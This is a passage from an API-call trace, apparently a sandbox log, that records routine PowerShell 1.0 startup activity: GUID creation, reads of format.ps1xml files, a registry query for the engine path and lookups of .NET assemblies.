[6]=0x2e, [7]=0x1f))) returned 0x0 [0026.572] CoCreateGuid (in: pguid=0x1ce3d8 | out: pguid=0x1ce3d8*(Data1=0x5e330305, Data2=0x30b9, Data3=0x4374, Data4=([0]=0xb0, [1]=0x3d, [2]=0xd0, [3]=0x9f, [4]=0x83, [5]=0x12, [6]=0x63, [7]=0xef))) returned 0x0 [0026.572] CoCreateGuid (in: pguid=0x1ce3d8 | out: pguid=0x1ce3d8*(Data1=0x53798cc2, Data2=0x6a0f, Data3=0x4215, Data4=([0]=0x8a, [1]=0xda, [2]=0x58, [3]=0xdf, [4]=0x37, [5]=0x2, [6]=0xab, [7]=0x30))) returned 0x0 [0026.572] CoCreateGuid (in: pguid=0x1ce3d8 | out: pguid=0x1ce3d8*(Data1=0xd78681bb, Data2=0xa7c3, Data3=0x4819, Data4=([0]=0xbb, [1]=0x4d, [2]=0x62, [3]=0x61, [4]=0xa2, [5]=0xd4, [6]=0x95, [7]=0xc4))) returned 0x0 [0026.572] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1cde7c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44 [0026.572] GetLastError () returned 0x0 [0026.572] SetErrorMode (uMode=0x1) returned 0x1 [0026.572] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\certificate.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x2f8 [0026.573] GetLastError () returned 0x0 [0026.573] GetFileType (hFile=0x2f8) returned 0x1 [0026.573] SetErrorMode (uMode=0x1) returned 0x1 [0026.573] GetFileType (hFile=0x2f8) returned 0x1 [0026.573] ReadFile (in: hFile=0x2f8, lpBuffer=0x2262850, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ce3e4, lpOverlapped=0x0 | out: lpBuffer=0x2262850*, lpNumberOfBytesRead=0x1ce3e4*=0x1000, lpOverlapped=0x0) returned 1 [0026.575] GetLastError () returned 0x0 [0026.575] ReadFile (in: hFile=0x2f8, lpBuffer=0x2262850, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ce3e4, lpOverlapped=0x0 | out: lpBuffer=0x2262850*, lpNumberOfBytesRead=0x1ce3e4*=0x1000, lpOverlapped=0x0) returned 1 [0026.575] GetLastError () returned 0x0 [0026.576] ReadFile (in: hFile=0x2f8, lpBuffer=0x2262850, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ce3e4, lpOverlapped=0x0 | out: lpBuffer=0x2262850*, lpNumberOfBytesRead=0x1ce3e4*=0x1000, lpOverlapped=0x0) returned 1 [0026.576] GetLastError () returned 0x0 [0026.576] ReadFile (in: hFile=0x2f8, lpBuffer=0x2262850, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ce3e4, lpOverlapped=0x0 | out: lpBuffer=0x2262850*, lpNumberOfBytesRead=0x1ce3e4*=0x1000, lpOverlapped=0x0) returned 1 [0026.576] GetLastError () returned 0x0 [0026.577] ReadFile (in: hFile=0x2f8, lpBuffer=0x2262850, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ce3e4, lpOverlapped=0x0 | out: lpBuffer=0x2262850*, lpNumberOfBytesRead=0x1ce3e4*=0x1000, lpOverlapped=0x0) returned 1 [0026.577] GetLastError () returned 0x0 [0026.577] ReadFile (in: hFile=0x2f8, lpBuffer=0x2262850, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ce3e4, lpOverlapped=0x0 | out: lpBuffer=0x2262850*, lpNumberOfBytesRead=0x1ce3e4*=0x1000, lpOverlapped=0x0) returned 1 [0026.577] GetLastError () returned 0x0 [0026.577] ReadFile (in: hFile=0x2f8, lpBuffer=0x2262850, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ce3e4, lpOverlapped=0x0 | out: lpBuffer=0x2262850*, lpNumberOfBytesRead=0x1ce3e4*=0xaca, lpOverlapped=0x0) returned 1 [0026.577] GetLastError () returned 0x0 [0026.577] ReadFile (in: hFile=0x2f8, lpBuffer=0x2261eba, nNumberOfBytesToRead=0x136, lpNumberOfBytesRead=0x1ce3e4, lpOverlapped=0x0 | out: lpBuffer=0x2261eba*, lpNumberOfBytesRead=0x1ce3e4*=0x0, lpOverlapped=0x0) returned 1 [0026.577] GetLastError () returned 0x0 [0026.577] ReadFile (in: hFile=0x2f8, lpBuffer=0x2262850, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ce3e4, lpOverlapped=0x0 | out: lpBuffer=0x2262850*, lpNumberOfBytesRead=0x1ce3e4*=0x0, lpOverlapped=0x0) returned 1 [0026.577] GetLastError () returned 0x0 [0026.577] CloseHandle (hObject=0x2f8) returned 1 [0026.577] GetLastError () returned 0x0 [0026.577] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1cdf44, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44 [0026.577] GetLastError () returned 0x0 [0026.577] SetErrorMode (uMode=0x1) returned 0x1 [0026.577] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\certificate.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x228384c | out: lpFileInformation=0x228384c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a051ba0, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a051ba0, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd2d2d8fc, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x6aca)) returned 1 [0026.577] GetLastError () returned 0x0 [0026.577] SetErrorMode (uMode=0x1) returned 0x1 [0026.577] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1cdf10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44 [0026.577] GetLastError () returned 0x0 [0026.578] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ce368 | out: phkResult=0x1ce368*=0x2f8) returned 0x0 [0026.578] RegQueryValueExW (in: hKey=0x2f8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ce3b0, lpData=0x0, lpcbData=0x1ce3ac*=0x0 | out: lpType=0x1ce3b0*=0x1, lpData=0x0, lpcbData=0x1ce3ac*=0x56) returned 0x0 [0026.578] RegQueryValueExW (in: hKey=0x2f8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ce3b0, lpData=0x2b64c0, lpcbData=0x1ce3ac*=0x56 | out: lpType=0x1ce3b0*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1ce3ac*=0x56) returned 0x0 [0026.578] RegCloseKey (hKey=0x2f8) returned 0x0 [0026.578] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1cdf10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44 [0026.578] GetLastError () returned 0x0 [0026.578] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1cdea4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44 [0026.578] GetLastError () returned 0x0 [0026.591] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\mscorlib.dll", nBufferLength=0x105, lpBuffer=0x1cdbd4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\mscorlib.dll", lpFilePart=0x0) returned 0x3a [0026.591] GetLastError () returned 0x0 [0026.593] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1cdbd4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0026.593] GetLastError () returned 0x57 [0026.600] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", nBufferLength=0x105, lpBuffer=0x1cdbd4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", lpFilePart=0x0) returned 0x48 [0026.600] GetLastError () returned 0x57 [0026.607] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cdbd4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0026.607] GetLastError () returned 0x57 [0026.613] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x1cdbd4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e [0026.613] GetLastError () returned 0x57 [0026.619] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Core\\3.5.0.0__b77a5c561934e089\\System.Core.dll", nBufferLength=0x105, lpBuffer=0x1cdbd4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Core\\3.5.0.0__b77a5c561934e089\\System.Core.dll", lpFilePart=0x0) returned 0x52 [0026.620] GetLastError () returned 0x57 [0026.627] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Configuration.Install\\2.0.0.0__b03f5f7f11d50a3a\\System.Configuration.Install.dll", nBufferLength=0x105, lpBuffer=0x1cdbd4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Configuration.Install\\2.0.0.0__b03f5f7f11d50a3a\\System.Configuration.Install.dll", lpFilePart=0x0) returned 0x74 [0026.627] GetLastError () returned 0x57 [0026.633] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x1cdbd4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70 [0026.633] GetLastError () returned 0x57 [0026.640] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_32\\System.Transactions\\2.0.0.0__b77a5c561934e089\\System.Transactions.dll", nBufferLength=0x105, lpBuffer=0x1cdbd4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_32\\System.Transactions\\2.0.0.0__b77a5c561934e089\\System.Transactions.dll", lpFilePart=0x0) returned 0x60 [0026.640] GetLastError () returned 0x57 [0026.646] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x1cdbd4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86 [0026.646] GetLastError () returned 0x57 [0026.653] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x1cdbd4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c [0026.653] GetLastError () returned 0x57 [0026.660] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x1cdbd4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76 [0026.660] GetLastError () returned 0x57 [0026.667] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Xml\\2.0.0.0__b77a5c561934e089\\System.Xml.dll", nBufferLength=0x105, lpBuffer=0x1cdbd4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Xml\\2.0.0.0__b77a5c561934e089\\System.Xml.dll", lpFilePart=0x0) returned 0x50 [0026.667] GetLastError () returned 0x57 [0026.673] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management\\2.0.0.0__b03f5f7f11d50a3a\\System.Management.dll", nBufferLength=0x105, lpBuffer=0x1cdbd4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management\\2.0.0.0__b03f5f7f11d50a3a\\System.Management.dll", lpFilePart=0x0) returned 0x5e [0026.673] GetLastError () returned 0x57 [0026.680] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.DirectoryServices\\2.0.0.0__b03f5f7f11d50a3a\\System.DirectoryServices.dll", nBufferLength=0x105, lpBuffer=0x1cdbd4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.DirectoryServices\\2.0.0.0__b03f5f7f11d50a3a\\System.DirectoryServices.dll", lpFilePart=0x0) returned 0x6c [0026.680] GetLastError () returned 0x57 [0026.686] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\mscorlib.dll", nBufferLength=0x105, lpBuffer=0x1cdbd4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\mscorlib.dll", lpFilePart=0x0) returned 0x3a [0026.686] GetLastError () returned 0x57 [0026.686] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1cdbd4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0026.686] GetLastError () returned 0x57 [0026.687] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", nBufferLength=0x105, lpBuffer=0x1cdbd4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", lpFilePart=0x0) returned 0x48 [0026.687] GetLastError () returned 0x57 [0026.687] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cdbd4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0026.687] GetLastError () returned 0x57 [0026.687] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cdc10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0026.687] GetLastError () returned 0x57 [0026.687] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cdbc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0026.687] GetLastError () returned 0x57 [0026.687] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cdbc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0026.687] GetLastError () returned 0x57 [0026.687] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cdbc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0026.687] GetLastError () returned 0x57 [0026.713] VirtualQuery (in: lpAddress=0x1cd0c0, lpBuffer=0x1ce0c0, dwLength=0x1c | out: lpBuffer=0x1ce0c0*(BaseAddress=0x1cd000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0026.713] CoCreateGuid (in: pguid=0x1ce3d8 | out: pguid=0x1ce3d8*(Data1=0x72a8eab5, Data2=0x2ed6, Data3=0x47f4, Data4=([0]=0x82, [1]=0x9d, [2]=0x99, [3]=0xc6, [4]=0xae, [5]=0xcf, [6]=0xae, [7]=0x55))) returned 0x0 [0026.714] CoCreateGuid (in: pguid=0x1ce3d8 | out: pguid=0x1ce3d8*(Data1=0xbec971cd, Data2=0xd556, Data3=0x4691, Data4=([0]=0x8d, [1]=0xf6, [2]=0xda, [3]=0xa, [4]=0x2c, [5]=0xaf, [6]=0xa2, [7]=0x64))) returned 0x0 [0026.714] VirtualQuery (in: lpAddress=0x1cd138, lpBuffer=0x1ce138, dwLength=0x1c | out: lpBuffer=0x1ce138*(BaseAddress=0x1cd000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0026.714] VirtualQuery (in: lpAddress=0x1cd138, lpBuffer=0x1ce138, dwLength=0x1c | out: lpBuffer=0x1ce138*(BaseAddress=0x1cd000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0026.714] CoCreateGuid (in: pguid=0x1ce3d8 | out: pguid=0x1ce3d8*(Data1=0xf70e0a4c, Data2=0x2c0a, Data3=0x4105, Data4=([0]=0x81, [1]=0x82, [2]=0xd5, [3]=0x1, [4]=0xa0, [5]=0x7, [6]=0xc0, [7]=0x58))) returned 0x0 [0026.715] CoCreateGuid (in: pguid=0x1ce3d8 | out: pguid=0x1ce3d8*(Data1=0x94df8bec, Data2=0x127a, Data3=0x4cd3, Data4=([0]=0xb0, [1]=0xa, [2]=0x6d, [3]=0x39, [4]=0x63, [5]=0x3a, [6]=0xa6, [7]=0xae))) returned 0x0 [0026.715] VirtualQuery (in: lpAddress=0x1cd264, lpBuffer=0x1ce264, dwLength=0x1c | out: lpBuffer=0x1ce264*(BaseAddress=0x1cd000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0026.715] VirtualQuery (in: lpAddress=0x1cd110, lpBuffer=0x1ce110, dwLength=0x1c | out: lpBuffer=0x1ce110*(BaseAddress=0x1cd000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0026.716] VirtualQuery (in: lpAddress=0x1cd110, lpBuffer=0x1ce110, dwLength=0x1c | out: lpBuffer=0x1ce110*(BaseAddress=0x1cd000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0026.716] CoCreateGuid (in: pguid=0x1ce3d8 | out: pguid=0x1ce3d8*(Data1=0xc370d7e6, Data2=0xa07a, Data3=0x4387, Data4=([0]=0xa1, [1]=0x97, [2]=0x5e, [3]=0x58, [4]=0x71, [5]=0x95, [6]=0xb2, [7]=0xb5))) returned 0x0 [0026.716] VirtualQuery (in: lpAddress=0x1cd264, lpBuffer=0x1ce264, dwLength=0x1c | out: lpBuffer=0x1ce264*(BaseAddress=0x1cd000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0026.716] VirtualQuery (in: lpAddress=0x1cd17c, lpBuffer=0x1ce17c, dwLength=0x1c | out: lpBuffer=0x1ce17c*(BaseAddress=0x1cd000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0026.716] VirtualQuery (in: lpAddress=0x1cce30, lpBuffer=0x1cde30, dwLength=0x1c | out: lpBuffer=0x1cde30*(BaseAddress=0x1cc000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0026.717] VirtualQuery (in: lpAddress=0x1cce30, lpBuffer=0x1cde30, dwLength=0x1c | out: lpBuffer=0x1cde30*(BaseAddress=0x1cc000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0026.717] CoCreateGuid (in: pguid=0x1ce3d8 | out: pguid=0x1ce3d8*(Data1=0x6271f074, Data2=0xc02b, Data3=0x4acb, Data4=([0]=0x85, [1]=0x3f, [2]=0x7d, [3]=0x5e, [4]=0x40, [5]=0xf8, [6]=0x9e, [7]=0x52))) returned 0x0 [0026.717] CoCreateGuid (in: pguid=0x1ce3d8 | out: pguid=0x1ce3d8*(Data1=0x39091e9a, Data2=0xe026, Data3=0x4129, Data4=([0]=0xa0, [1]=0x6d, [2]=0x37, [3]=0x57, [4]=0xd6, [5]=0x16, [6]=0x2f, [7]=0x8))) returned 0x0 [0026.717] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1cde7c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44 [0026.717] GetLastError () returned 0x57 [0026.717] SetErrorMode (uMode=0x1) returned 0x1 [0026.717] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x2f8 [0026.717] GetLastError () returned 0x0 [0026.717] GetFileType (hFile=0x2f8) returned 0x1 [0026.717] SetErrorMode (uMode=0x1) returned 0x1 [0026.717] GetFileType (hFile=0x2f8) returned 0x1 [0026.718] ReadFile (in: hFile=0x2f8, lpBuffer=0x22e8914, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ce3e4, lpOverlapped=0x0 | out: lpBuffer=0x22e8914*, lpNumberOfBytesRead=0x1ce3e4*=0x1000, lpOverlapped=0x0) returned 1 [0026.719] GetLastError () returned 0x0 [0026.720] ReadFile (in: hFile=0x2f8, lpBuffer=0x22e8914, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ce3e4, lpOverlapped=0x0 | out: lpBuffer=0x22e8914*, lpNumberOfBytesRead=0x1ce3e4*=0x1000, lpOverlapped=0x0) returned 1 [0026.720] GetLastError () returned 0x0 [0026.720] ReadFile (in: hFile=0x2f8, lpBuffer=0x22e8914, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ce3e4, lpOverlapped=0x0 | out: lpBuffer=0x22e8914*, lpNumberOfBytesRead=0x1ce3e4*=0x1000, lpOverlapped=0x0) returned 1 [0026.720] GetLastError () returned 0x0 [0026.720] ReadFile (in: hFile=0x2f8, lpBuffer=0x22e8914, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ce3e4, lpOverlapped=0x0 | out: lpBuffer=0x22e8914*, lpNumberOfBytesRead=0x1ce3e4*=0x1000, lpOverlapped=0x0) returned 1 [0026.720] GetLastError () returned 0x0 [0026.721] ReadFile (in: hFile=0x2f8, lpBuffer=0x22e8914, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ce3e4, lpOverlapped=0x0 | out: lpBuffer=0x22e8914*, lpNumberOfBytesRead=0x1ce3e4*=0x1000, lpOverlapped=0x0) returned 1 [0026.721] GetLastError () returned 0x0 [0026.721] ReadFile (in: hFile=0x2f8, lpBuffer=0x22e8914, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ce3e4, lpOverlapped=0x0 | out: lpBuffer=0x22e8914*, lpNumberOfBytesRead=0x1ce3e4*=0x1000, lpOverlapped=0x0) returned 1 [0026.721] GetLastError () returned 0x0 [0026.721] ReadFile (in: hFile=0x2f8, lpBuffer=0x22e8914, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ce3e4, lpOverlapped=0x0 | out: lpBuffer=0x22e8914*, lpNumberOfBytesRead=0x1ce3e4*=0x1000, lpOverlapped=0x0) returned 1 [0026.721] GetLastError () returned 0x0 [0026.721] ReadFile (in: hFile=0x2f8, lpBuffer=0x22e8914, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ce3e4, lpOverlapped=0x0 | out: lpBuffer=0x22e8914*, lpNumberOfBytesRead=0x1ce3e4*=0x1000, lpOverlapped=0x0) returned 1 [0026.722] GetLastError () returned 0x0 [0026.723] ReadFile (in: hFile=0x2f8, lpBuffer=0x22e8914, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ce3e4, lpOverlapped=0x0 | out: lpBuffer=0x22e8914*, lpNumberOfBytesRead=0x1ce3e4*=0x1000, lpOverlapped=0x0) returned 1 [0026.723] GetLastError () returned 0x0 [0026.723] ReadFile (in: hFile=0x2f8, lpBuffer=0x22e8914, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ce3e4, lpOverlapped=0x0 | out: lpBuffer=0x22e8914*, lpNumberOfBytesRead=0x1ce3e4*=0x1000, lpOverlapped=0x0) returned 1 [0026.723] GetLastError () returned 0x0 [0026.723] ReadFile (in: hFile=0x2f8, lpBuffer=0x22e8914, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ce3e4, lpOverlapped=0x0 | out: lpBuffer=0x22e8914*, lpNumberOfBytesRead=0x1ce3e4*=0x1000, lpOverlapped=0x0) returned 1 [0026.723] GetLastError () returned 0x0 